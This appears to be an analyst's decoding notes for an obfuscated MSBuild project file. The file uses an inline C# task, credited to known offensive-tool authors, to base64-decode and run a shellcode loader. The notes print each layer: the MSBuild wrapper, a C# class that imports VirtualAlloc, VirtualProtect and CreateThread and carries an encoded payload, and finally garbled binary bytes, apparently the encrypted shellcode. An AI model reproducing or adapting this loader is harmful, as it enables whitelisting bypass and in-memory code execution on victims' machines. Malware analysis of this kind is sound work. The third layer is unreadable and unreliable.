triple_base64_decoded.txt

1. 1# decode
2. ----------------------------
3. <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
4. <!-- This inline task executes c# code. -->
5. <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe nps.xml -->
6. <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->
7. <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->
8. <!-- Created C# payload: Franci Sacer, Twitter: @francisacer1 -->
9. <!-- License: BSD 3-Clause -->
10. <Target Name="npscsharp">
11. <nps />
12. </Target>
13. <UsingTask
14. TaskName="nps"
15. TaskFactory="CodeTaskFactory"
16. AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
17. <Task>
18. <Code Type="Class" Language="cs">
19. <![CDATA[
20. using System;
21. using System.Collections.Generic;
22. using System.Linq;
23. using System.Text;
24. using System.Runtime.InteropServices;
25. using System.Collections.ObjectModel;
26. using Microsoft.Build.Framework;
27. using Microsoft.Build.Utilities;
28. using Microsoft.CSharp;
29. using System.CodeDom.Compiler;
30. using System.Reflection;
31.  
32. public class nps : Task, ITask
33. {
34. public override bool Execute()
35. {
36. Console.WriteLine("hey");
37. string cmd = "CnVzaW5nIFN5c3RlbTsKdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwp1c2luZyBTeXN0ZW0uVGV4dDsKcHVibGljIGNsYXNzIENsYXNzRXhhbXBsZQp7CiAgICBwcml2YXRlIHN0YXRpYyBVSW50MzIgTUVNX0NPTU1JVCA9IDB4MTAwMDsKICAgIHByaXZhdGUgc3RhdGljIFVJbnQzMiBQQUdFX1JFQURXUklURSA9IDB4MDQ7CiAgICBwcml2YXRlIHN0YXRpYyBVSW50MzIgUEFHRV9FWEVDVVRFX1JFQUQgPSAweDIwOwogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHByaXZhdGUgc3RhdGljIGV4dGVybiBVSW50MzIgVmlydHVhbEFsbG9jKFVJbnQzMiBscFN0YXJ0QWRkciwgVUludDMyIHNpemUsIFVJbnQzMiBmbEFsbG9jYXRpb25UeXBlLCBVSW50MzIgZmxQcm90ZWN0KTsKICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyIildCiAgICBwcml2YXRlIHN0YXRpYyBleHRlcm4gYm9vbCBWaXJ0dWFsUHJvdGVjdChJbnRQdHIgYWRkcmVzcywgVUludDMyIHNpemUsIFVJbnQzMiBuZXdQcm90ZWN0LCBvdXQgVUludDMyIG9sZFByb3RlY3QpOwogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHByaXZhdGUgc3RhdGljIGV4dGVybiBJbnRQdHIgQ3JlYXRlVGhyZWFkKAogICAgICAgIFVJbnQzMiBscFRocmVhZEF0dHJpYnV0ZXMsCiAgICAgICAgVUludDMyIGR3U3RhY2tTaXplLAogICAgICAgIFVJbnQzMiBscFN0YXJ0QWRkcmVzcywKICAgICAgICBJbnRQdHIgcGFyYW0sCiAgICAgICAgVUludDMyIGR3Q3JlYXRpb25GbGFncywKICAgICAgICByZWYgVUludDMyIGxwVGhyZWFkSWQKICAgICk7CiAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMiIpXQogICAgcHJpdmF0ZSBzdGF0aWMgZXh0ZXJuIFVJbnQzMiBXYWl0Rm9yU2luZ2xlT2JqZWN0KEludFB0ciBoSGFuZGxlLCBVSW50MzIgZHdNaWxsaXNlY29uZHMpOwogICAgcHVibGljIHZvaWQgRXhlY3V0ZSgpIHsKICAgICAgICBzdHJpbmcgcmF3ID0gQCJIbjhPYVEwMk1YWStjamdsTXpFYkNRRkpLanBZQVM1MEpVWTVZaU1CRkQwUVBnVk5BVXNxSW54VEpFb2NNRFlQSmw4SEVTMDNkU3dwR3djSFZWVmVhaHBEQkdRaWZ3UTFDaFVGTXdGSUlYbFpVeVVKR0RZNFpqSi9CRDhkSFRrN0lUa3JHVmxUQ3drY01odFBTQUlEUmpNakJUVWxHeWNQUzBkVlNnMFVFd05UZmloR0cyZCtWaWRMVXlaVlZTVmdKVVlYWENaU1Boc3pJelV1QVVrRUxuQlVLSFVPUGdOMVYzOGNNeEFYSHdBL1NpVVhabHd2Rm5neEdGRXdXUU1sYkEwSlRVZFhXaWxRZDFKVktEWXlXQU1FSEFNN0FoOE5QREFBSUhNZlNHOEJFd1JqTWdjK0lnOS9La2twT1NJTVpXZGVEeTBnQ0VRK1pVaEhGajRNQlNNK0J6MVRYVFZQS0VROVVETmFJUkVVUFhrYUp3RWhHRkpkQzFJV0lFVUhLMHdUQXhjUVBnVUxGanA3ZkdRaVRBRTBHMUFGY1J3RUFBY1BLakl2TFQ5VFJ5VldBeHNxQWhjWlh5QVBaUU1US1VrdEdWQjJCSHdOTmpSWURuYzFOeHNYZERnd0FpRUFmSFVYVmhnaUIwODlmaVVQT0FKMEN6d3VFenAvWGoxWEFRMGNmRE5pT2dFTE9SdFRKUk5hZkdNRElWOFZSQUJGTXdZVVF3aG5Gd2tKUHlwOGYzWXBEUjhjR0hBd1dENDZPQk1BRlF3OVVnTmplQXQxS0JrWVlEVllHMFEvQVNFTURSTXRHbFYySlU4dEdoeDlLbUkyUHdnNEtTZ0pBaWw1VTJVdGFoWXlISDRGY1RvY0R6OTBDajhXRXdoU0FROU1LQ0lxZkFOK05pUUFaQUJTQzBnbENXVmxFMGd2R3paWUExMG1RQlFTSVRRTEZEa0ZZM1VUYnhZeU9tTTBjejVIRFFJZ
38. ------------------------------------
39. 2# decode
40. ------------------------------------
41. using System;
42. using System.Runtime.InteropServices;
43. using System.Text;
44. public class ClassExample
45. {
46. private static UInt32 MEM_COMMIT = 0x1000;
47. private static UInt32 PAGE_READWRITE = 0x04;
48. private static UInt32 PAGE_EXECUTE_READ = 0x20;
49. [DllImport("kernel32")]
50. private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
51. [DllImport("kernel32")]
52. private static extern bool VirtualProtect(IntPtr address, UInt32 size, UInt32 newProtect, out UInt32 oldProtect);
53. [DllImport("kernel32")]
54. private static extern IntPtr CreateThread(
55. UInt32 lpThreadAttributes,
56. UInt32 dwStackSize,
57. UInt32 lpStartAddress,
58. IntPtr param,
59. UInt32 dwCreationFlags,
60. ref UInt32 lpThreadId
61. );
62. [DllImport("kernel32")]
63. private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
64. public void Execute() {
65. string raw = @"Hn8OaQ02MXY+cjglMzEbCQFJKjpYAS50JUY5YiMBFD0QPgVNAUsqInxTJEocMDYPJl8HES03dSwpGwcHVVVeahpDBGQifwQ1ChUFMwFIIXlZUyUJGDY4ZjJ/BD8dHTk7ITkrGVlTCwkcMhtPSAIDRjMjBTUlGycPS0dVSg0UEwNTfihGG2d+VidLUyZVVSVgJUYXXCZSPhszIzUuAUkELnBUKHUOPgN1V38cMxAXHwA/SiUXZlwvFngxGFEwWQMlbA0JTUdXWilQd1JVKDYyWAMEHAM7Ah8NPDAAIHMfSG8BEwRjMgc+Ig9/KkkpOSIMZWdeDy0gCEQ+ZUhHFj4MBSM+Bz1TXTVPKEQ9UDNaIREUPXkaJwEhGFJdC1IWIEUHK0wTAxcQPgULFjp7fGQiTAE0G1AFcRwEAAcPKjIvLT9TRyVWAxsqAhcZXyAPZQMTKUktGVB2BHwNNjRYDnc1NxsXdDgwAiEAfHUXVhgiB089fiUPOAJ0CzwuEzp/Xj1XAQ0cfDNiOgELORtTJRNafGMDIV8VRABFMwYUQwhnFwkJPyp8f3YpDR8cGHAwWD46OBMAFQw9UgNjeAt1KBkYYDVYG0Q/ASEMDRMtGlV2JU8tGhx9KmI2Pwg4KSgJAil5U2UtahYyHH4FcTocDz90Cj8WEwhSAQ9MKCIqfAN+NiQAZABSC0glCWVlE0gvGzZYA10mQBQSITQLFDkFY3UTbxYyOmM0cz5HDQI
66. -------------------------------------
67. 3# decode
68. -------------------------------------
69. i
70. 61v>r8%31
    I*:X
    .t%F9b#
    =>M
    K*"|S$J06&_-7u,)UU^jCd"5
71. 3
    H!yYS% 68f2?9;!9+YS 2OHF3#5%'KGUJ
72. S~(Fg~V'KS&UU%`%F\&R>3#5.
    I.pT(u>uW3?J%f\/x1Q0Y%l
73. MGWZ)PwRU(62X;
74. <0 sHo
    c2>"*I)9"eg^- D>eHG>#>=S]5O(D=P3Z!=y'
    !R]R E+L>:{|d"L
    4Pq*2/-?SG%V*_ e)I-Pv|
75. 64Xw57t80!|uV"O=~%8t<.:^=W
    
76. |3b:
    9S%Z|c!_DE3Cg ?*|v)
77. p0X>:8=Rcxu(`5XD?
    !
78. -Uv%O-}*b6?8)( )ySe-j2~q:?t
79. ?R
    L("*|~6$dRH% eeH/6X]&@!49cuo2:c4s>G
80.